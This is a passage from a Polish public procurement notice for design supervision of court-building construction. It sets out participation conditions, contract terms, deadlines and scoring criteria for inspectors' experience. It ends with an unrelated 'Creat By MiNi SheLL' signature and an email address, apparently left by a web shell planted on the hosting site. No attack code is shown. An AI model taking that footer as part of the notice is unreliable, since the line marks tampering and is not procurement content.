wykonawcy o aktualności informacji zawartych w wstępnym oświadczeniu, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>	w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j.Dz.U.2023.1497 z p. zm.);<br/>	w art. 5k ust. 1 rozporządzenia rady (UE) 2022/576 z dnia 8 kwietnia 2022 r. w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniem Rosji destabilizującymi sytuację na Ukrainie (Dz. U. UE L 229 z 31.07.2014 str. 1 z p. zm.)<br/>- wzór oświadczenia zostanie przekazany wykonawcy wraz z wezwaniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 7 lat liczonych wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów– oświadczenie Wykonawcy.<br/>a)	Warunkiem udziału w postępowaniu jest posiadanie wiedzy <br/>i doświadczenia niezbędnego do wykonania przedmiotu zamówienia tzn. świadczenie usługi, w okresie ostatnich siedmiu lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie łącznie:<br/>- co najmniej jednej usługi nadzoru autorskiego nad robotami budowlanymi prowadzonymi na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej jednej usługi polegającej na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2: <br/><br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzór wykazu osób zostanie przekazany wykonawcy wraz z wezwaniem. <br/>Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału w postępowaniu, jeżeli wykaże, że dysponuje wymaganą ilością osób zdolnych do wykonania zamówienia oraz skieruje je do realizacji zamówienia, tj.<br/><br/>....w/g SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.2	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia podmiotowe środki dowodowe, wymienione w pkt. 8.1.1 a-g) składa każdy z wykonawców występujących wspólnie.-cd w/g SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 5 do SWZ- wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kryterium II - Doświadczenie osób pełniących funkcje inspektorów nadzoru autorskiego wyznaczonych do realizacji zamówienia. <br/>Ocenie podlega ilość zrealizowanych w okresie ostatnich 7 lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, nadzorów autorskich nad robotami w poszczególnych branżach, polegających na: budowie, przebudowie lub remoncie budynku sądu lub innego obiektu kubaturowego na potrzeby Ministerstwa Sprawiedliwości o powierzchni całkowitej budynku minimum 1.000 m2 każda i usługę polegającą na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 łącznie– waga 40% (40 pkt.), w tym po max 8% (8 pkt.) dla każdej z osób sprawujących nadzór autorski poniższych branż. <br/>Kryterium II.1.: <br/>Zamawiający przyzna punkty za doświadczenie Koordynatora, Inspektora nadzoru autorskiego w specjalności architektonicznej, na następujących zasadach:<br/> Gdy wykaże:<br/>- 1 nadzór autorski na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej jedną usługę polegającą na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 – otrzyma 4 pkt.<br/>Gdy wykaże:<br/>- 2 nadzory autorskiej na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej 2 usługi polegające na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 –otrzyma 8 pkt.<br/>Analogicznie w pozostałych kryteriach, adekwatnie do specjalności:<br/>Kryterium II.2.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności konstrukcyjno-budowlanej.<br/>Kryterium II.3.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, na następujących zasadach.<br/>Kryterium II.4.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz elektroenergetycznych.<br/>Kryterium II.5.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektor nadzoru autorskiego w zakresie sieci, instalacji i urządzeń telekomunikacyjnych.<br/><br/><br/>Dokumentacja techniczna- ze względu na wielkość plików nie została załączona, WYKONAWCY zainteresowani otrzymaniem dokumentacji proszeni o zgłoszenie zainteresowania na platformie e-zamówienia.<br/><br/><br/>Wykonawca winien uwzględnić podczas realizacji przedmiotu zamówienia wymogi określone w ustawie z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (Dz. U. z 2024 r. poz. 1289 ze zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com